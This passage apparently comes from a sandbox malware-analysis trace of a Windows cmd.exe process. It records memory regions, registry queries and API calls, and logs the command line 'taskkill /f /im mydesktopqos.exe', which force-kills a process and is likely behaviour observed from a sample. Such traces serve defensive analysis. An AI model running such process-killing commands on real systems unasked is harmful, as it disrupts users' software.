AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2255 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2256 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2257 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2258 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2259 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2260 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2261 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2262 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2263 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2264 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2265 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 2266 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2267 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2268 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2269 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2270 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 2271 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2272 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 2273 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 2274 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2275 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2276 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2277 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2278 start_va = 0x4f0000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 2279 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2280 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2281 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2282 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2283 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2284 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2285 start_va = 0x4f0000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 2286 start_va = 0x530000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2287 start_va = 0x680000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 2288 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2289 start_va = 0x780000 end_va = 0x97ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 2290 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2291 start_va = 0x980000 end_va = 0xcb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 184 os_tid = 0x304 [0162.037] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0162.037] __set_app_type (_Type=0x1) [0162.037] __p__fmode () returned 0x74974d6c [0162.037] __p__commode () returned 0x74975b1c [0162.037] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0162.037] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0162.038] GetCurrentThreadId () returned 0x304 [0162.038] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x304) returned 0x78 [0162.038] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0162.038] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0162.038] SetThreadUILanguage (LangId=0x0) returned 0x409 [0162.048] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0162.048] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0162.049] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.049] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0162.049] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0162.049] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.049] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0162.049] GetConsoleOutputCP () returned 0x1b5 [0162.051] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0162.051] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0162.051] _get_osfhandle (_FileHandle=1) returned 0x140 [0162.051] SetConsoleMode (hConsoleHandle=0x140, dwMode=0x0) returned 0 [0162.052] _get_osfhandle (_FileHandle=1) returned 0x140 [0162.052] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0162.052] _get_osfhandle (_FileHandle=0) returned 0x13c [0162.052] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0162.052] GetEnvironmentStringsW () returned 0x687fe8* [0162.052] GetProcessHeap () returned 0x680000 [0162.052] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xa1a) returned 0x688a10 [0162.052] FreeEnvironmentStringsA (penv="A") returned 1 [0162.052] GetProcessHeap () returned 0x680000 [0162.052] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x4) returned 0x687e70 [0162.052] GetEnvironmentStringsW () returned 0x687fe8* [0162.052] GetProcessHeap () returned 0x680000 [0162.052] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xa1a) returned 0x689438 [0162.052] FreeEnvironmentStringsA (penv="A") returned 1 [0162.053] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0162.053] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0162.053] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0162.053] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0162.053] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0162.053] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0162.053] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0162.053] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0162.053] RegCloseKey (hKey=0x88) returned 0x0 [0162.053] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0162.054] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0162.054] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0162.054] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0162.054] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0162.054] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0162.054] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0162.054] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0162.054] RegCloseKey (hKey=0x88) returned 0x0 [0162.054] time (in: timer=0x0 | out: timer=0x0) returned 0x62344210 [0162.054] srand (_Seed=0x62344210) [0162.054] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im mydesktopqos.exe \"" [0162.054] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im mydesktopqos.exe \"" [0162.056] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0162.056] GetProcessHeap () returned 0x680000 [0162.056] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x210) returned 0x686fa0 [0162.056] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x686fa8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0162.056] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0162.056] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0162.056] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0162.056] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0162.056] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0162.056] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0162.056] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0162.056] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0162.057] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0162.057] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0162.057] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0162.057] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0162.057] GetProcessHeap () returned 0x680000 [0162.058] RtlFreeHeap (HeapHandle=0x680000, Flags=0x0, BaseAddress=0x688a10) returned 1 [0162.058] GetEnvironmentStringsW () returned 0x687fe8* [0162.058] GetProcessHeap () returned 0x680000 [0162.058] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xa32) returned 0x68a8a0 [0162.058] FreeEnvironmentStringsA (penv="A") returned 1 [0162.058] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0162.058] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0162.058] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0162.058] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0162.058] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0162.058] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0162.059] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0162.059] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0162.059] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0162.059] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0162.059] GetProcessHeap () returned 0x680000 [0162.059] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x44) returned 0x6871b8 [0162.059] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0162.059] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0162.059] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0162.059] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x687208 [0162.059] FindClose (in: hFindFile=0x687208 | out: hFindFile=0x687208) returned 1 [0162.059] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x687208 [0162.060] FindClose (in: hFindFile=0x687208 | out: hFindFile=0x687208) returned 1 [0162.060] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0162.060] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x687208 [0162.060] FindClose (in: hFindFile=0x687208 | out: hFindFile=0x687208) returned 1 [0162.060] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0162.060] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0162.060] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0162.060] GetProcessHeap () returned 0x680000 [0162.061] RtlFreeHeap (HeapHandle=0x680000, Flags=0x0, BaseAddress=0x68a8a0) returned 1 [0162.061] GetEnvironmentStringsW () returned 0x687fe8* [0162.061] GetProcessHeap () returned 0x680000 [0162.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xa76) returned 0x689e60 [0162.061] FreeEnvironmentStringsA (penv="=") returned 1 [0162.061] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0162.061] GetProcessHeap () returned 0x680000 [0162.061] RtlFreeHeap (HeapHandle=0x680000, Flags=0x0, BaseAddress=0x6871b8) returned 1 [0162.061] GetProcessHeap () returned 0x680000 [0162.061] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x400e) returned 0x68bd60 [0162.062] GetProcessHeap () returned 0x680000 [0162.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x54) returned 0x6871b8 [0162.062] GetProcessHeap () returned 0x680000 [0162.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x4008) returned 0x68fd78 [0162.062] GetProcessHeap () returned 0x680000 [0162.062] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x4008) returned 0x693d88 [0162.064] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0162.064] GetProcessHeap () returned 0x680000 [0162.064] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x418) returned 0x68a8e0 [0162.064] SetErrorMode (uMode=0x0) returned 0x8003 [0162.064] SetErrorMode (uMode=0x1) returned 0x0 [0162.064] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x68a8e8, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0162.064] SetErrorMode (uMode=0x8003) returned 0x1 [0162.064] GetProcessHeap () returned 0x680000 [0162.064] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x68a8e0, Size=0x86) returned 0x68a8e0 [0162.065] GetProcessHeap () returned 0x680000 [0162.065] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x68a8e0) returned 0x86 [0162.065] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0162.065] GetProcessHeap () returned 0x680000 [0162.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x62) returned 0x687218 [0162.065] GetProcessHeap () returned 0x680000 [0162.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xb8) returned 0x68a970 [0162.065] GetProcessHeap () returned 0x680000 [0162.065] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x68a970, Size=0x62) returned 0x68a970 [0162.065] GetProcessHeap () returned 0x680000 [0162.065] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x68a970) returned 0x62 [0162.065] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0162.065] GetProcessHeap () returned 0x680000 [0162.065] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xe0) returned 0x68a9e0 [0162.070] GetProcessHeap () returned 0x680000 [0162.070] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x68a9e0, Size=0x76) returned 0x68a9e0 [0162.070] GetProcessHeap () returned 0x680000 [0162.070] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x68a9e0) returned 0x76 [0162.070] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0162.071] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im mydesktopqos.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0162.071] GetLastError () returned 0x3 [0162.071] GetProcessHeap () returned 0x680000 [0162.072] RtlFreeHeap (HeapHandle=0x680000, Flags=0x0, BaseAddress=0x68fd78) returned 1 [0162.072] GetProcessHeap () returned 0x680000 [0162.072] RtlFreeHeap (HeapHandle=0x680000, Flags=0x0, BaseAddress=0x693d88) returned 1 [0162.072] GetProcessHeap () returned 0x680000 [0162.073] RtlFreeHeap (HeapHandle=0x680000, Flags=0x0, BaseAddress=0x68bd60) returned 1 [0162.073] GetConsoleOutputCP () returned 0x1b5 [0162.121] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0162.121] GetUserDefaultLCID () returned 0x409 [0162.122] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0162.122] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0162.122] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0162.122] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0162.122] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0162.122] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0162.122] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0162.122] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0162.122] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0162.122] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0162.122] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0162.122] 